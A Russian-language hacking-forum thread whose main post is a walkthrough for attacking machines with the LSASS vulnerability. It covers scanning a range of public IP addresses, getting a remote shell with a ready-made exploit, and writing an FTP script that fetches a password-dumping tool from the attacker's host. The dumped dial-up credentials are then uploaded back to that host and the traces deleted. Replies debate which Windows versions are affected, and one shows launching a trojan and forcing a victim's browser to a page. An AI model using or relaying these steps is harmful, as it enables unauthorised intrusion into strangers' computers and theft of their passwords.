• XSS.stack #1 – первый литературный журнал от юзеров форума

Полный мануал по использованию LSASS уязвимости

Tycoon

RAM
Пользователь
Регистрация
31.12.2004
Сообщения
106
Реакции
0
Пожалуйста, обратите внимание, что пользователь заблокирован
Полный мануал по использованию LSASS уязвимости.

Начнём

Для нашего злого дела нам нужно всего три (четыре, если считать FTP сервер) программки - сканер на уязвимые машины – DSScan, очень полезная программулина SmallSoft Lsa Service Exploit, к сожалению, я не знаю автора думаю, он меня простит ;) (ссылки на весь нужный софт в конце статьи), и известная всем фриинетчикам прога dialupass2, показывающая все данные dialup (включая пароль).

Для охоты нам нужно выбрать диапазон IP адресов, возьмём мою любимую экву (57.66.158.1-57.66.158.255). В сканер Dsscan записываем Start IP 57.66.158.1 и End IP 57.66.158.255 - сканирование началось, внизу начали появляться Ip-шники, самый важный для нас столбец это “Status” – Not Vulnerable означает, что система не пропатчена или профаерволена, VLNERABLE – значит система уязвима, то что нам надо!


3003.jpg


Теперь нужно атаковать удалённый комп, открываем SmallSoft Lsa Service Exploit , в строку IP-адрес вставляем скопированный нами IP , шелл порт оставляем как есть, тип атаки выбираем «Шелл» и нажимает кнопочку «НАЧАТЬ» Должно появиться что-то вроде этого:

4003.jpg


Если вы увидели это, то атака прошла успешно. Спустя некоторое временя появиться ДОСовское окошко... Кто юзал Kaht2 могут дальше не читать, а кто новичок в этом деле – читайте дальше. Перед вами удалённая командная строка, теперь мы можем творить с этим компьютером всё, что захотим, но нам нужны пароли от dialup ...

Для начала создайте папочку Temp на диске D:\ или на каком вам удобно и киньте туда файлик dialupass2.exe прежде переименовав его в z.exe. Запускаем наш FTP сервер и заходим в раздел User Accounts. Нажимаем кнопку add () и в появившемся окошке вписываем имя пользователя (к примеру a) - нажимаем ok - дальше нам необходимо выбрать папку откуда будут закачивается и выкачиваться файлы – это и есть папка Temp, где лежит наш z.exe. Далее укажите пароль для этого пользователя (к примеру тоже a =)), расставьте все стрелки, кроме Allow delete и нажмите кнопку Update. После всех проделанных действий необходимо потестить как оно работает или нет. Нажимаем в вверху зеленую кнопку и переходим в раздел Server Log, если написано: “FTP server started on port 21” , то всё сконфигурировано удачно.

6003.jpg


Теперь возвращаемся в удалённую командную строку и там пишем:
Cd \ [переходим в корневую директорию]
echo open xxx.xxx.xxx.xxx>go&&echo a>>go&&echo a>>go [где xxx.xxx.xxx.xxx – это ваш IP, этой командой мы создаём на диске C:\ удалённой машины файл go – он нужен для подключения к вашему ftp серверу]
ftp –s:go [подключаемся к ftp]
Проконтролировать подключение можно по логам FTP сервера. Ну и далее:

get z.exe

Этой командой мы закачали dialupass2 на удаленный компьютер. Теперь нам надо его запустить, пишем в консоли:

bye [отключаем свой удаленный компьютер от вашего FTP сервера и переходим снова в консоль] и



Этим мы запускаем dialupass на удаленном компьютере и все содержимое отчета выводим в соответствующую папку и в файл ps.html. Теперь нам только осталась забрать файл ps.html.

ftp –s:go [опять подключаемся к ftp со сценарием, находящимся в файле go]
send ps.html [этой командой мы отправляем с удалённого компа к себе на ftp файл, созданный dialupass2]

Смотрим Server Log - должна пойти закачка. После того как файл закачается пишем:

bye
del go [Удаляем следы с удаленного компьютера]
del z.exe
del ps.html

Вот и все, теперь у тебя в папке FTP сервера лежит файл ps.html, в нем находятся Dialup пароли.

Ссылки на нужный софт :

http://xarakiri.by.ru/Glob/pablos_ftp_server_v1_52.zip
http://xarakiri.by.ru/Glob/dialupass2.rar
http://www.securitylab.ru/tools/_services/download/?ID=45056
http://xakepy.ru/attachment.php?attachmentid=251
 
Tycoon, с НГ тебя еще раз!!!

если выкладываешь статью, то обычно автора ее пишут.
а если уж даешь ссылки, то будь добр проверить их валидность.

к примеру http://xarakiri.by.ru/Glob/dialupass2.rar - мертвая, а если кому-то все-таки прога нужна, то сливаем отсюда
 
Для сведения - сплоит рубит тачки исключительно WinXp sp1
Win200 - 2003 не видет в упор - пишет что они не уязвимы...

Имхо лучше поднимать порт выше стоящего по дефолту.
 
берет на ура все если 445 порт открыт))
???

Что все? ...
Ты хоть знаеш что за уязвимость эксплуатирует этот эксплоит?
Повторяю он для WIN XP - c открытым 455 портом Только Для XP sp1 !!!
И то если закрыть порт - облом. Кстати первые статьи (с каритнаким) появились в сети еще в в конце 2004 начале 2005 года Не мороч людям гоову...
 
Klamb - твой XP ??? :D

если ты сам в это хочеш поверить - верь, только людей больше не смеши
на sp2 уже стоит патч от LSASS уязвимости мне это не объясняй, когда ты видимо только учился включать компьютер, пол инета юзало этот сплоит + и читали даннцую статью, где автор, даже не удасужился поставить копирайты на источник. :angry2:
Почему то не кто не сделал такого Гениального открытия

Сразу нашел что искал - Обрати внимание на Дату Статьи! Искатель Крякра Интернета

Я тебе могу наьбросать туеву кучу ссылок с Сек Лаба и других сайтов про описание этой уязвимости и сам эксплоит.
Мне лично фиалетово все твои Воображения и пожелания, одно прошу - не говори что белое это черное и невводи народ в заблуждение.
И учись фтыкать внимательно иначе ломаком и умерш. :rtfm:
Раз тебе что то сказали, сначала хотя бы проверь.
 
s__p - ну так и запускай его как обычный ехе шник у себя на компе из командной строки

напр: c:\troyan.exe - жми педаль Ентера...
или можеш так: start toroyan.exe

Один из любимых приколоф раньше был гггг, загонять юсера на нужную тебе пагу....

start iexplore.exe http://xss.pro/

и у чела, не зависимо под чем откроется осел и ое окажется у нас в Госятх :D
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх